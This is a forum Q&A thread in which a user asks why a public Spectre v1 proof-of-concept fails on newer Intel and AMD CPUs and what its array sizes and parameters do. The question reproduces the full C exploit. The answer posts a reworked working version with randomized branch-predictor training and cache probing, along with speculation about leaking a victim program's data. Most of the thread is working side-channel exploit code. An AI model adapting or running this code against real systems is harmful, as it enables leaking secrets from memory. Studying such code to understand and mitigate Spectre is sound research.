Example of Spectre v1 on new CPU

217 views Asked by At

I know how Spectre works, and I found a program on GitHub that demonstrates it. However, on my computers running Windows 10 21H2 (i5-11400F, i5-9600K, R7-5800HS) it does not work: it only prints question marks, whereas on an i5-7500U, also under Windows 10, it works. I know that patches and mitigations were released after 2018, but they all protect against access to other programs' memory; in this case the data that Spectre reads was created by the same program, so those protections should not affect the result. Questions:

  1. Can this program work on new processors?
  2. What are its parameters responsible for (why are the arrays given these particular sizes)?

Code from GitHub:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
/* Number of leading array1 elements that victim_function() accepts as in bounds. */
unsigned int array1_size = 16;

/* Not referenced by the code shown.
 * NOTE(review): presumably padding that keeps array1 apart from its
 * neighbours in memory -- confirm before removing or reordering. */
uint8_t unused1[64];

/* Only the first 16 of the 160 bytes are listed; the remainder are zero. */
uint8_t array1[160] = {
        1, 2, 3, 4, 5, 6, 7, 8,
        9, 10, 11, 12, 13, 14, 15, 16
};

/* Not referenced by the code shown (see the note on unused1). */
uint8_t unused2[64];

/* Probe array: 256 slots spaced 512 bytes apart, one per possible byte value. */
uint8_t array2[256 * 512];

/* The 40-character string that main() targets by default. */
char *secret = "The Magic Words are Squeamish Ossifrage.";

/* Sink for the victim's load, so the compiler cannot drop victim_function(). */
uint8_t temp = 0;

/*
 * Victim routine of the demonstration.
 *
 * When x is below array1_size, reads array1[x], multiplies that byte by 512
 * to select a slot in array2, and ANDs the byte found there into the global
 * temp. When x is out of range the function does nothing architecturally.
 *
 * x: index into array1; readMemoryByte() passes either an in-range training
 *    index or the out-of-range offset it wants to probe.
 */
void victim_function(size_t x) {
    if (x < array1_size) {
        /* The array2 slot that gets touched depends on the value of array1[x]. */
        temp &= array2[array1[x] * 512];
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* a timed read counts as a cache hit if its elapsed TSC count is <= this */

/*
 * Try to recover the byte located malicious_x bytes past the start of array1.
 *
 * For up to 999 rounds the function flushes the array2 probe slots, calls
 * victim_function() 30 times (mostly with an in-range training index,
 * sometimes with malicious_x), then times a read of every probe slot and
 * tallies the fast ones in results[].
 *
 * malicious_x: offset handed to victim_function() on the attack calls.
 * value:       out - value[0] is the best guess, value[1] the runner-up.
 * score:       out - tallies for value[0] and value[1] respectively.
 *
 * results[] is static, so the function is not reentrant.
 */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    static int results[256];
    int tries, i, j, k, mix_i, junk = 0;
    size_t training_x, x;
    uint64_t time1, time2;
    volatile uint8_t * addr;

    /* results is static, so clear the tallies left over from the previous call. */
    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--) {

        /* Flush array2[512*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            /* Flush the bound so the comparison inside victim_function() has to wait for it. */
            _mm_clflush( & array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF...FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 (all ones) if j%6==0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x)); /* mask all ones -> malicious_x, mask 0 -> training_x */

            /* Call the victim! */
            victim_function(x);

        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255; /* 167 is odd, so this visits each of 0..255 exactly once */
            addr = & array2[mix_i * 512];
            time1 = __rdtsc(); /* READ TIMER */
            junk = * addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            /* Ignore the slot that this round's training index touches legitimately. */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                k = j;
                j = i;
            } else if (k < 0 || results[i] >= results[k]) {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is >= 2*runner-up + 5, or the tallies are exactly 2 vs 0 */
    }
    results[0] ^= junk; /* use junk so the code above won't get optimized out */
    value[0] = (uint8_t) j;
    score[0] = results[j];
    value[1] = (uint8_t) k;
    score[1] = results[k];
}

/*
 * Entry point of the demonstration.
 *
 * With no arguments, probes the 40 bytes of the built-in secret string.
 * With exactly two arguments, argv[1] is an address in "%p" format and
 * argv[2] is the number of bytes to read starting there.
 *
 * Returns 0 on completion, or EXIT_FAILURE when the two optional arguments
 * cannot be parsed.
 */
int main(int argc,
         const char * * argv) {
    /* Default target: the secret string, expressed as a byte offset from
     * array1. Computed on integers because the two objects are unrelated. */
    size_t malicious_x = (size_t)((uintptr_t) secret - (uintptr_t) array1);
    int score[2], len = 40;
    uint8_t value[2];

    for (size_t i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */

    if (argc == 3) {
        void *target = NULL;

        /* Parse both arguments before touching malicious_x, so that a bad
         * argument cannot leave a half-converted offset behind. */
        if (sscanf(argv[1], "%p", &target) != 1 ||
            sscanf(argv[2], "%d", &len) != 1) {
            fprintf(stderr, "usage: %s [address length]\n", argv[0]);
            return EXIT_FAILURE;
        }
        /* Convert the absolute address into an offset from array1. */
        malicious_x = (size_t)((uintptr_t) target - (uintptr_t) array1);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        /* Non-printable guesses are shown as '?'. */
        printf("0x%02X=’%c’ score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        printf("\n");
    }
    return (0);
}
1

There are 1 answers

10
taburetca On

The Spectre vulnerability also works on new processors. All of the protections are aimed at preventing one program from obtaining another program's data, but this example will work everywhere, since everything happens inside a single program. I am not very familiar with operating systems, but it may be possible that, if the attacking program launches the victim program inside itself, it can obtain data from the victim program.

Changes: I removed what I considered unnecessary for the program to work, namely the score. I also reworked the predictor training: it seems to me that, with the program from the question, new processors predicted the loop and optimized it, so I decided to use rand to make such optimization impossible. I did the same in the section that reads data from the cache. I also removed the

 if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 
   break;

It was needed to speed up the program, but its second part did not seem quite right to me, so in the end I removed it altogether, since the program already runs fast enough. I also changed how the input data is supplied and how the output is written.

#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#ifdef _MSC_VER
#include <intrin.h> // работа с кэшем win
#else
#include <x86intrin.h> //работа с кэшем
#endif
/* Default cache-hit threshold; main() hands it to readMemoryByte(). */
const unsigned int Time_To_Cashe = 160u;

/* Bound that victim_function() checks before indexing trash. */
unsigned int array1_size = 5u;

/* Filler values read during the training calls. */
uint8_t trash[5] = {1, 2, 3, 4, 5};

/* Probe array: 256 slots spaced 512 bytes apart, one per possible byte value. */
uint8_t array2[256 * 512];

/* Receives the byte loaded by victim_function(). */
uint8_t temp = 0;

/*
 * The Spectre gadget itself.
 *
 * When x is below array1_size, reads trash[x], multiplies that byte by 512
 * to select a slot in array2, and stores the byte found there in the global
 * temp. When x is out of range the function does nothing architecturally.
 *
 * x: index into trash; readMemoryByte() passes either a training index or
 *    the out-of-range offset it wants to probe.
 */
void victim_function(size_t x) {
  if (x < array1_size) {
    /* The array2 slot that gets touched depends on the value of trash[x]. */
    temp = array2[trash[x] * 512];
  }
}

/*
 * Guess the byte located attack_x bytes past the start of trash.
 *
 * Runs 500 rounds. Each round flushes the array2 probe slots, calls
 * victim_function() 32 times with a mix of training indices and attack_x,
 * then times 256 randomly chosen probe-slot reads and counts the fast ones.
 *
 * cache_hit_threshold: a timed read counts as a cache hit when its elapsed
 *                      TSC count is <= this value; a negative value
 *                      disables counting.
 * attack_x:            offset passed to victim_function() on attack calls.
 *
 * Returns the byte value with the highest hit count; ties go to the largest
 * value.
 */
uint8_t readMemoryByte(int cache_hit_threshold, size_t attack_x) {
  int results[256] = {0};

  for (int tries = 500; tries > 0; tries--) {
    /* Evict every probe slot of array2 from the cache. */
    for (int i = 0; i < 256; i++)
      _mm_clflush(&array2[i * 512]);

    size_t train_x = (unsigned int)tries % array1_size;

    for (int j = 31; j >= 0; j--) {
      _mm_clflush(&array1_size);
      /*
       * mask is all ones (x becomes attack_x) whenever the product below is
       * a multiple of 4, which is always the case for j % 4 == 0; otherwise
       * it is 0, 1 or 2. The arithmetic is unsigned because rand() + 1 and
       * the multiplication can overflow int when RAND_MAX == INT_MAX; the
       * result modulo 4 is unchanged wherever the int version did not
       * overflow.
       */
      size_t mask =
          (size_t)((((unsigned int)rand() + 1u) * (unsigned int)(j % 4)) % 4u) - 1;
      size_t x = train_x ^ (mask & (attack_x ^ train_x));
      victim_function(x);
    }

    for (int i = 0; i < 256; i++) {
      /*
       * Probe slots in random order so the access pattern is not
       * predictable. A slot may be hit twice or skipped within one round;
       * over 500 rounds every slot still gets sampled.
       */
      int sim = rand() % 256;
      volatile uint8_t *rd = &array2[sim * 512];
      /*
       * __rdtscp stores the processor ID through its argument. It must not
       * point into array2, otherwise the timer read itself touches the line
       * that is about to be timed.
       */
      unsigned int aux;

      uint64_t start = __rdtscp(&aux);
      uint8_t probe = *rd; /* the timed access; rd is volatile so it is kept */
      uint64_t elapsed = __rdtscp(&aux) - start;
      (void)probe;

      /* Skip the slot that this round's training index touches legitimately. */
      if (cache_hit_threshold >= 0 &&
          elapsed <= (uint64_t)cache_hit_threshold &&
          sim != trash[train_x])
        results[sim]++;
    }
  }

  /* Pick the value with the most hits; >= keeps the last of equal maxima. */
  int max = 0;
  for (int i = 1; i < 256; i++) {
    if (results[i] >= results[max])
      max = i;
  }
  return (uint8_t)max;
}

/*
 * Write one character to out, or to standard output when out is NULL.
 *
 * Declared static inline: a plain `inline` definition in C99/C11 does not
 * emit an external definition, so any call the compiler chooses not to
 * inline would fail at link time.
 */
static inline void print(char c, FILE *out) {
  fputc(c, out != NULL ? out : stdout);
}

/*
 * Entry point.
 *
 * argv[1] is the string to recover through readMemoryByte(); it is required.
 * argv[2], when exactly two arguments are given, names a file that receives
 * the recovered characters; otherwise they go to standard output.
 *
 * Returns 0 on success, or EXIT_FAILURE when the secret argument is missing
 * or the output file cannot be closed cleanly.
 */
int main(int argc, char **argv) {
  if (argc < 2) {
    fprintf(stderr, "usage: %s <secret> [output-file]\n",
            argc > 0 ? argv[0] : "spectre");
    return EXIT_FAILURE;
  }

  int cache_hit_threshold = (int)Time_To_Cashe;
  const char *secret = argv[1];
  /* Byte offset of the secret from trash. Computed on integers because the
   * two objects are unrelated. */
  size_t malicious_x = (size_t)((uintptr_t)secret - (uintptr_t)trash);
  size_t len = strlen(secret);

  FILE *out = NULL;
  if (argc == 3) {
    out = fopen(argv[2], "w");
    if (out == NULL) {
      /* Output still falls back to stdout; just report why. */
      perror(argv[2]);
    }
  }

  /* Write a non-zero value to every byte of array2 before probing.
   * NOTE(review): presumably so the pages are really backed by memory --
   * confirm. */
  for (size_t i = 0; i < sizeof(array2); i++) {
    array2[i] = 1;
  }

  /* Recover the secret in order, one character per call. */
  while (len-- > 0) {
    print((char)readMemoryByte(cache_hit_threshold, malicious_x++), out);
  }

  if (out != NULL && fclose(out) != 0) {
    perror(argv[2]);
    return EXIT_FAILURE;
  }
  return 0;
}

I may be wrong in many places, so please correct me if I got something wrong or made a mistake somewhere.